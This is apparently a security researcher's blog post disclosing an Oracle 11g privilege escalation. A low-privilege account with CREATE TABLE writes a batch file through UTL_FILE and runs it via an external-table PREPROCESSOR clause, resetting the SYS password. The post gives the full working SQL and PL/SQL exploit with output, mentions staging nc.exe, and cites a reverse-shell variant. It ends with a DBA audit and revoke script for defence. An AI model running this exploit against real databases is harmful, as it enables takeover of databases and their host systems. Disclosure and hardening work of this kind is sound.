Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)


CREATE TABLE to OSDBA

I have written a new paper entitled CREATE TABLE to OSDBA with reverse shell. The paper includes demo code for 11.1.0.7 Windows and UNIX (but not 10g).

The demo shows that in 11g, granting EXECUTE on a directory object to a user who holds nothing more than the common CREATE TABLE privilege is effectively equivalent to granting them OSDBA: the new external-table PREPROCESSOR clause runs the named file as the Oracle software owner on the OS.

Once an OS shell script has been written through UTL_FILE (which is still executable by PUBLIC) and then executed by SELECTing from the external table, the script runs as the Oracle OS user and can act on any part of the OS that user owns, so the directory object's path restriction no longer limits the attacker.

I will be discussing how to protect against this as well as the growing number of unpublished 11g “CREATE SESSION to DBA” zero-days, in the new SANS DAMS and Oracle 11g security course. Build up your flood defenses in preparation by attending the session below on December 5th:
http://www.sans.org/london09/description.php?tid=3602

Here’s the demo for Windows (see paper for UNIX OSDBA reverse shell demo).

--Prepare the low privilege attacker account
SQL> create user ctto identified by ctto;
User created.

SQL> grant create session to ctto;
Grant succeeded.

SQL> grant create table to ctto;
Grant succeeded.

SQL> grant all on directory log_dir to public;
Grant succeeded.

SQL> conn ctto/ctto
Connected.

SQL> select * from user_role_privs;
no rows selected

SQL> select * from user_sys_privs;

USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
CTTO                           CREATE SESSION                           NO
CTTO                           CREATE TABLE                             NO

SQL> select * from user_tab_privs;
no rows selected

--The low-privilege ctto account looks for a directory object left open to PUBLIC, which is usually the case.
--On 10g an open directory only gives READ/WRITE; on 11g the new EXECUTE privilege also allows
--commands to be executed via the directory through the external-table PREPROCESSOR clause.

SQL> SELECT TABLE_NAME FROM ALL_TAB_PRIVS WHERE TABLE_NAME IN
  2  (SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='DIRECTORY')
  3  AND PRIVILEGE='EXECUTE' ORDER BY GRANTEE;
TABLE_NAME
------------------------------
LOG_DIR

SQL> SELECT DIRECTORY_PATH FROM ALL_DIRECTORIES WHERE DIRECTORY_NAME='LOG_DIR';
DIRECTORY_PATH
--------------------------------------------------------------------------
C:\SCRIPTS
Windows CREATE TABLE to SYSDBA and OSDBA

--Write a batch file to the OS that will call the second .sql (UTL_FILE is executable by PUBLIC).
--The batch file runs as the Oracle OS user, so "/ as sysdba" OS authentication succeeds without a password.
declare
    f utl_file.file_type;
    s varchar2(200) := 'sqlplus -S -L / as sysdba @c:\scripts\changepassword.sql';
begin
    f := utl_file.fopen('LOG_DIR','changesyspw.bat','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
--Write the changepassword.sql that will be called by the batch file.
declare
    f utl_file.file_type;
    s varchar2(200) := 'alter user sys identified by newpassword;';
begin
    f := utl_file.fopen('LOG_DIR','changepassword.sql','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
--Execute the batch file via an external table PREPROCESSOR clause (see http://structureddata.org/2008/11/19/preprocessor-for-external-tables/).
--The table itself only needs CREATE TABLE plus EXECUTE on the directory; the batch file is run when the table is read.
CREATE TABLE execute_mybinary( "testrow" VARCHAR2(60))
ORGANIZATION EXTERNAL(
  TYPE oracle_loader  DEFAULT DIRECTORY LOG_DIR
  ACCESS PARAMETERS  (
     RECORDS DELIMITED BY NEWLINE
     PREPROCESSOR LOG_DIR:'changesyspw.bat' OPTIONS '-R'
     BADFILE LOG_DIR:'execute_mybinary.bad'
     LOGFILE LOG_DIR:'execute_mybinary.log'
     FIELDS TERMINATED BY '|'
     MISSING FIELD VALUES ARE NULL  (
        "testrow"     )  )
  LOCATION ('changesyspw.bat'))
REJECT LIMIT UNLIMITED;

--From another SYS session, record the current SYS password hash
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
5638228DAF52805F

--As ctto, the low-privilege user executes the .bat simply by SELECTing from the external table
select count(*) from execute_mybinary;

--You will receive a KUP-04095 error, but the script will already have changed the SYS password:
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
66A86F065449C773

--Tested and working on 11.1.0.7 
SQL> select * from v$version;
BANNER
--------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
PL/SQL Release 11.1.0.7.0 - Production
CORE    11.1.0.7.0      Production
TNS for 32-bit Windows: Version 11.1.0.7.0 - Production
NLSRTL Version 11.1.0.7.0 - Production

A low-privilege attacker can also write an nc.exe binary to the OS using UTL_FILE in binary mode, as per the method outlined in http://www.oracleforensics.com/wordpress/index.php/2008/10/10/create-any-directory-to-sysdba/

Given that there will always be new, unexpected attacks, it is essential to monitor DB user activity via a DAMS so that suspicious activity can be alerted on. http://www.sans.org/london09/description.php?tid=3602
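The attack chains three conditions: EXECUTE on a directory held by a non-DBA (PUBLIC in the demo), UTL_FILE executable by PUBLIC so the script can be staged, and an external table with a PREPROCESSOR clause. As an added example that is not from the paper or the original post, the following DBA-run script checks each condition against the data dictionary and then closes them for the demo's LOG_DIR. It assumes a DBA session with access to DBA_TAB_PRIVS, DBA_DIRECTORIES, DBA_ROLE_PRIVS and DBA_EXTERNAL_TABLES, and that 11g standard auditing (AUDIT ... ON DIRECTORY) is in use; the directory name LOG_DIR is taken from the demo and should be substituted with each directory the first query returns.

```sql
-- Added example (not the paper's code). Run as a DBA on 11g.
SET SERVEROUTPUT ON

-- 1. Directory objects on which EXECUTE (the 11g preprocessor privilege) is held
--    by anyone not holding the DBA role. A PUBLIC row here is the demo's precondition.
--    Grants that reach non-DBAs via intermediate roles are not expanded by this query.
SELECT p.grantee, p.table_name AS directory_name, d.directory_path, p.privilege
  FROM dba_tab_privs   p
  JOIN dba_directories d ON d.directory_name = p.table_name
 WHERE p.privilege = 'EXECUTE'
   AND p.grantee NOT IN (SELECT grantee FROM dba_role_privs WHERE granted_role = 'DBA')
 ORDER BY p.grantee, p.table_name;

-- 2. Is UTL_FILE still executable by PUBLIC? Without it (or another way to write
--    into the directory path) the attacker cannot stage the .bat/.sh file.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS' AND table_name = 'UTL_FILE' AND grantee = 'PUBLIC';

-- 3. External tables that already carry a PREPROCESSOR clause. ACCESS_PARAMETERS is a
--    LONG column, so it is scanned from PL/SQL (where LONG fetches into VARCHAR2)
--    rather than with a LIKE predicate in plain SQL.
DECLARE
  v_params VARCHAR2(32767);
BEGIN
  FOR t IN (SELECT owner, table_name, default_directory_name, access_parameters
              FROM dba_external_tables) LOOP
    v_params := t.access_parameters;
    IF INSTR(UPPER(v_params), 'PREPROCESSOR') > 0 THEN
      DBMS_OUTPUT.PUT_LINE('PREPROCESSOR clause in ' || t.owner || '.' || t.table_name
                           || ' (default directory ' || t.default_directory_name || ')');
    END IF;
  END LOOP;
END;
/

-- 4. Close the chain for the demo's directory (repeat for every row from query 1).
--    Taking away EXECUTE removes the preprocessor path; taking away WRITE stops
--    UTL_FILE from staging the script there in the first place.
REVOKE EXECUTE ON DIRECTORY log_dir FROM PUBLIC;
REVOKE WRITE   ON DIRECTORY log_dir FROM PUBLIC;

-- UTL_FILE should not be PUBLIC; re-grant EXECUTE only to the schemas that need it.
REVOKE EXECUTE ON utl_file FROM PUBLIC;

-- 5. Audit what remains so the audit trail (and hence a DAMS) records an attempt:
--    EXECUTE on the directory and CREATE TABLE statements, one record per access.
AUDIT EXECUTE ON DIRECTORY log_dir BY ACCESS;
AUDIT TABLE BY ACCESS;
```

Query 1 is the defender's view of the same ALL_TAB_PRIVS lookup the attacker runs above: if it returns PUBLIC, or any account that also holds CREATE TABLE, that account can reach the OS as the Oracle user. The revokes in step 4 are the minimum fix; the audit options in step 5 are what make the external-table creation and the directory EXECUTE visible to monitoring rather than silent.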

Cheers,
Paul
